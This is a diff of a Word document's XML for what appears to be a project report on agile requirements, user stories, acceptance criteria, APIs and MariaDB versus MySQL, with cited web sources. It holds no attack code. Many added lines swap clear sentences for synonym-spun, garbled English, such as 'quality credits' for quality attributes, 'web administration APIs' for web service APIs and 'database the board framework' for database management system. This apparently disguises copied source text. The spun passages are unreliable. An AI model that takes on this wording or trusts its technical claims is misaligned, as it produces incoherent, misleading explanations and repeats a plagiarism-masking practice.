+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A forum that members can use to communicate with each other</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc116304446"/>
+      <w:r>
+        <w:t>Non-functional requirements</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Non-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>functional</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>requirement</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> characterize how well an answer needs to perform. Otherwise called quality credits, non-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>functional requirements</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> depict the overall qualities of an item or framework. They depict how it should act and lay out requirements on its usefulness.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Non-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>functional requirements</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> are generally founded on something you can </w:t>
+      </w:r>
+      <w:r>
+        <w:t>measure</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Like convenience, security, unwavering quality and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>performance</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc116304447"/>
+      <w:r>
+        <w:t>User stories</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>User</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> stories will assist with communicating prerequisites according to the viewpoint of an end client. Distinguishing </w:t>
+      </w:r>
+      <w:r>
+        <w:t>user</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> stories toward the start of an undertaking can assist with joining individuals survey which highlights are the most significant and foster items or administrations that address the issues of the individual getting them. They can likewise assist with joining individuals separate explicit item includes into more modest and more reasonable undertakings.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>As a user, I would like to receive an email after registration so I can confirm my email address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>As a customer service representative, I need to improve our customer response time so we can retain customers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>As an investor, I need to see a daily summary of my investment accounts so I can focus on which one needs my immediate attention.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>These user stories clearly define what features they may want and why. By identifying users' needs with user stories, teams can focus on producing higher-quality products and services.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc116304448"/>
+      <w:r>
+        <w:t>Acceptance criteria</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:t>acceptance criteria</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> characterize how a group can test or gauge a client story to decide it's working. Groups use </w:t>
+      </w:r>
+      <w:r>
+        <w:t>acceptance criteria</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to recognize which measurements they can use to evaluate the progress of a task. Here are a few instances of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>acceptance criteria</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Has customer retention improved by 15% over the last year?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Is the speed of product dispatch under 24 hours?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Has the product range increased by 20% over the last two years?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Agile requirements</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="20"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Identifying agile requirements for a project can help teams understand what functions and features the finished product needs to have. It can also help set performance benchmarks so they can determine how well the product functions</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>To develop acceptance criteria, make sure the requirements follow the SMART goal methodology. SMART goals are goals that are specific, measurable, achievable, relevant and time-based.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc114487669"/>
-      <w:r>
-        <w:t>Functional requirements</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="21"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>An functional requirement identifies a function or features the finished product needs to have. Teams use this information to determine what steps they need to take to produce the desired product. They can also use this information to establish goals and benchmarks for production to help them track their progress.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Example:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>A landing page with a customer feedback form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>A search feature that allows users to find past invoices</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>A forum that members can use to communicate with each other</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc114487670"/>
-      <w:r>
-        <w:t>Non-functional requirements</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="22"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Non-functional requirements define how well a solution needs to perform. Also known as quality attributes, non-functional requirements describe the general characteristics of a product or system. They describe how it must behave and establish constraints on its functionality.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Non-functional requirements are usually based on something you can measure. Such as usability, security, reliability and performance.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc114487671"/>
-      <w:r>
-        <w:t>User stories</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="23"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>U</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ser stories </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">will help </w:t>
-      </w:r>
-      <w:r>
-        <w:t>to express requirements from the perspective of an end user. Identifying user stories at the beginning of a project can help team members assess which features are the most important and develop products or services that meet the needs of the person receiving them. They can also help team members break down specific product features into smaller and more manageable tasks.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Example:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>As a user, I would like to receive an email after registration so I can confirm my email address.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>As a customer service representative, I need to improve our customer response time so we can retain customers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>As an investor, I need to see a daily summary of my investment accounts so I can focus on which one needs my immediate attention.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>These user stories clearly define what features they may want and why. By identifying users' needs with user stories, teams can focus on producing higher-quality products and services.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc114487672"/>
-      <w:r>
-        <w:t>Acceptance criteria</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="24"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The acceptance criteria define how a team can test or measure a user story to determine it's working. Teams use acceptance criteria to identify which metrics they can use to assess the success of a project. Here are some examples of acceptance criteria:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="31"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Has customer retention improved by 15% over the last year?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="31"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Is the speed of product dispatch under 24 hours?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="31"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Has the product range increased by 20% over the last two years?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>To develop acceptance criteria, make sure the requirements follow the SMART goal methodology. SMART goals are goals that are specific, measurable, achievable, relevant and time-based.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc114487673"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="26" w:name="_Toc116304449"/>
+      <w:r>
         <w:t>User acceptance tests</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5940,6 +6738,38 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId28" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://www.indeed.com/career-advice/career-development/agile-requirements</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
@@ -5948,58 +6778,55 @@
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc114487674"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc116304450"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>API</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc114487675"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc116304451"/>
       <w:r>
         <w:t>What is an API?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>An API</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>an acronym for Application Programming Interface, is a set of definitions and protocols that allow technology products and services to communicate with each other via the internet.</w:t>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>An API, an abbreviation for Application Programming Interface, is a bunch of definitions and conventions that permit innovation items and administrations to speak with one another through the web.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc114487676"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc116304452"/>
       <w:r>
         <w:t>What are APIs used for?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>If you are a beginner programmer, you may be wondering what the definition of API is. An API (Application Programming Interface) allows your application to interact with an external service using a simple set of commands. To break down the name, the “Interface” is where different software components can interact. Using an API allows developers to add specific functionalities to their applications and can speed up the development process.</w:t>
+      <w:bookmarkEnd w:id="29"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In the event that you are a novice developer, you might be considering what the meaning of API is. An API (Application Programming Interface) permits your application to connect with an outside help utilizing a straightforward arrangement of orders. To separate the name, the "Interface" is where different programming parts can communicate. Utilizing an API permits developers to add explicit functionalities to their applications and can accelerate the improvement interaction</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc114487677"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc116304453"/>
       <w:r>
         <w:t>What Different Types of APIs are there?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6058,15 +6885,15 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc114487678"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc116304454"/>
       <w:r>
         <w:t>What are Web Service APIs?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Apart from the main web APIs, there are also web service APIs. A web service is a system or software the uses an address (ex: the URL on the World Wide Web) to provide access to its services. The most common types of web service APIs include:</w:t>
+      <w:bookmarkEnd w:id="31"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Aside from the primary web APIs, there are additionally web administration APIs. A web administration is a framework or programming the purposes a location (ex: the URL on the Internet) to give admittance to its administrations. The most widely recognized sorts of web administration APIs include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6117,8 +6944,293 @@
         <w:t>REST (Representational State Transfer): REST is not a protocol like the other web services. Instead, it is a set of architectural principles. The REST service needs to have certain characteristics, including simple interfaces, which are resources identified easily within the request and manipulation of resources using the interface.</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId29" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://rapidapi.com/blog/api-glossary/api/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_Toc116304455"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Database</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="32"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc116304456"/>
+      <w:r>
+        <w:t>MariaDB</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="33"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">MariaDB is a fork of the MySQL database the board framework. The RDBMS offers information handling abilities for both little and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>endeavour</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> undertakings.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This DBMS is a better adaptation of MySQL. It accompanies various inbuilt strong elements and many convenience's, security and execution upgrades that you can't find in MySQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="34" w:name="_Toc116304457"/>
+      <w:r>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="34"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>MySQL was one of the main open-source database accessible on the lookout. Today there are numerous options variations of MySQL. Nonetheless, the distinctions between the variations are not critical as they utilize a similar language structure, and essential usefulness likewise continues as before.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>MySQL is a RDBMS that assists you with keeping the information that exists in a database coordinated. It is utilized with the blend of PHP and Apache Web Server, on top of a Linux conveyance. MySQL utilizes the SQL language to question the database.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="35" w:name="_Toc116304458"/>
+      <w:r>
+        <w:t>Key Difference between MariaDB and MySQL</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="35"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MariaDB has 12 new storage engines, whereas MySQL has lesser storage engines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MariaDB has a larger connection pool supporting up to 200,000+ connections, whereas MySQL has a smaller connection pool.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Comparing MariaDB vs MySQL performance, In MariaDB, replication is faster, whereas in MySQL, replication is slower.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MariaDB is Open Source, whereas MySQL uses some proprietary code in its Enterprise Edition.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MariaDB doesn’t support Data Masking and Dynamic column while MySQL supports it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="35"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Comparing MariaDB or MySQL, Comparatively MariaDB is faster than MySQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pro’s when using MariaDB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>It operates under GPL, BSD, or LGPL licenses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MariaDB supports a popular and standard querying language.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>It comes with many storage engines, including the high-performance ones that can be integrated with other relational database management systems.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>It offers the advance Galera cluster technology.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>MariaDB supports PHP, a popular language for web development.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="36" w:name="_Toc116304459"/>
+      <w:r>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="36"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>MySQL is under the corporate umbrella of the greatest business database seller on the planet. With such countless full-time designs working nonstop to foster premium new elements, we as of now have a few places where they separate. MariaDB, then again, as a rule makes up for lost time with regards to premium increments however that isn't generally quick and there are no certifications.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Having said as much, however, there are numerous situations wherein MariaDB offers further developed execution. Add to this more spry fixes and updates, a more steady open source future, and somewhat more good faith.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId30" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://kinsta.com/blog/mariadb-vs-mysql/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId15"/>
+      <w:footerReference w:type="default" r:id="rId31"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -6451,6 +7563,118 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="08BF2AEC"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B39AB908"/>
+    <w:lvl w:ilvl="0" w:tplc="C31A60BA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
